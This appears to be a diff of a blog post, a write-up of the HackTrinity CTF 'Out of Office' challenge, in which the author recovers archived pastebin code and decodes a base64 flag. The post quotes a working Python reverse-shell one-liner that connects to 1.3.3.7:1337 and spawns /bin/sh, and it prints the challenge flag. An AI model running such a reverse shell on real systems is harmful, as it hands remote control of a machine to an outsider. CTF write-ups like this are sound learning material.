cianjinks/cianjinks.github.io/_posts/2020-03-23-hacktrinity-ctf-write-up.md

 ![HackTrinity_Out_Of_Office1.JPG]({{site.baseurl}}/img/HackTrinity_Out_Of_Office2.JPG)

 _However_ after quickly copying it over to my browser it returned a page not found error?
-I was left stumped for a short while before thinking of a website I had used many a time in the past called the .[Wayback Machine](https://archive.org/web/) which stores archived versions of webpages.
+I was left stumped for a short while before thinking of a website I had used many a time in the past called the [Wayback Machine](https://archive.org/web/) which stores archived versions of webpages.
 Sure enough there was one snapshot saved of this pastebin url and bingo some code was hidden within:

 ```python
 python - c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.3.3.7",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#
 all the 1337 hackers have a signature right ?
 SGFja1RyaW5pdHl7QWxXQHk1X0MxM2FOX1VwX0BmdDNyX3kwdVJfSEBjazV9Cg ==
 ```

-From the looks of things it opens a reverse connection on port 1337 to your machine.
+From the looks of things it opens a reverse shell connection on port 1337 to your machine.
 I was wondering where to go from here and thought maybe I should listen for traffic on said port or something along those lines when I realised that there was no way this code ever ran as the pastebin url was invalid.
 That's when I remembered the base64 encoded string at the bottom.
 When decoded it in fact returns the flag.

 {: .box-note}
 **Flag:** HackTrinity{AlW@y5_C13aN_Up_@ft3r_y0uR_H@ck5}